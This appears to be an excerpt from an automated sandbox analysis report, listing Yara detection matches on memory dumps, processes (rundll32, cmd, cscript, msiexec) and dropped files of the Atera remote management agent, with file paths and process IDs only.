                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C5BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C086000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3059593001.00000277DF63C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CBD11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2785272210.000001FC477E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2185698631.00000167D173D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3058139148.000002C38B679000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3054771885.0000015420BD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CC017000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E00132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2525824499.000002BEFB9C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2941460212.000001AF00177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459643421.00000125CB700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3070117213.000002C38B880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CBEBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2626766337.0000026D2DC40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2522503408.000002BEFA820000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000000.2256494928.0000015420AA2000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C617000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2186817722.00000167D1D97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2375461399.000001D73B677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2375461399.000001D73B614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2205583773.0000012CAFA21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4B8F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2365797816.000001D722822000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2186817722.00000167D1D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2725136640.000001AA4AFE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC4854D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2523120083.000002BEFAA85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C48B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2524849992.000002BEFACD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C4CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C0F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2523120083.000002BEFAA08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC480F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3172608638.000002C3A48BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2816995598.0000021B51848000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3054771885.0000015420B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2623179398.00000235A1386000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE803AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B52785000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3071249917.00000277DFE47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B527FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000003.2930359424.0000017CE789B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2185698631.00000167D16F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B529A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE8036E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2816995598.0000021B518C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C3E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2186704723.00000280BB111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1974508605.0000016E73A60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3056220052.00000277DF5A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2205416152.0000012CAF4A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000002.2931459924.0000017CE78A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2185698631.00000167D16BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC48141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4B910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002D.00000002.2623513745.00000221DBBF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CBF59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2186664381.00000167D1910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2725136640.000001AA4AFA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2725136640.000001AA4AFED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2779069857.000001FC476B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2472333825.00000125E48C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4B90E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C05D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2695588090.00000215A9080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2204369786.0000012CAF26B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5287E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3172608638.000002C3A48EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2626592410.0000026D2DB63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000003.2865653804.0000017CE835A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3071249917.00000277DFE02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2364287460.000001D722719000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3050283177.0000000E994F1000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2186817722.00000167D1E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4BB29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B52A08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2819380529.000001FC6076A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1975004017.0000016E73D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2204369786.0000012CAF2B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3058139148.000002C38B5F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3161735582.000002C3A45B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000000.2691141024.000002C38B3B2000.00000002.00000001.01000000.00000035.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C523000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2941460212.000001AF0011D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1975925687.0000016E7608C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2816995598.0000021B51840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2691710517.00000215A8E8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3054771885.0000015420C22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3071249917.00000277DFE1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1975898045.0000016E76050000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2186704723.00000280BB193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E000B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2941460212.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2186704723.00000280BB201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5279C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2326892892.0000019C0DCBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5241A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2691710517.00000215A8E7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2965977342.000001AF6AF00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2458294221.00000125CB540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2185697606.00000280BA9F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2186817722.00000167D1DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2941460212.000001AF00286000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2696202477.00000215A97BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3068434031.000002C38B812000.00000002.00000001.01000000.0000004B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2366809057.000001D722EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2185698631.00000167D16FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B51FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2204369786.0000012CAF239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3058139148.000002C38B6B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2730506028.000001AA4B828000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000002.2932103351.0000017CE835D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2364287460.000001D72275F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2205583773.0000012CAFAA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2730506028.000001AA4B7F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2326892892.0000019C0DCD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2623179398.00000235A133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5251C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3059593001.00000277DF630000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2185591000.00000280BA930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC48362000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C0D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2186817722.00000167D1DD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2185697606.00000280BA978000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2363884167.000001D722550000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2724449102.000001AA4AF30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C57A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2523120083.000002BEFAA00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C4B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2626592410.0000026D2DB4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2821992200.0000021B51AF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C047000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2186532729.00000167D18B2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3071249917.00000277DFDA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2379078434.000001D73BA20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.2149423855.00000167D1432000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3172608638.000002C3A490C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2630449499.00000235A1B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CBDA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1974338755.0000016E739D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3165784571.000002C3A4644000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC481AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3066742035.000001542163B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3059593001.00000277DF6BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38BFAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC48220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2630449499.00000235A1AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4304, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6812, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4320, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 348, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 3396, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7344, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7588, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7596, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7768, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 7836, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7996, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8132, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 7208, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageSTRemote.exe PID: 2756, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageMonitoring.exe PID: 6252, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 432, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5292, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 3236, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 7572, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 7676, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageTicketing.exe PID: 7732, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageOsUpdates.exe PID: 7812, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2128, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5956, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageInternalPoller.exe PID: 3940, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1432, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageProgramManagement.exe PID: 7284, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-17-2024 12_46_46-log.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF369C3B750C2D1E54.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFA4F603106DD881B4.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF8D0A16BC2D6921AC.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFC20E1DF72867B031.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFBE8D32C4C485895E.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, type: DROPPED
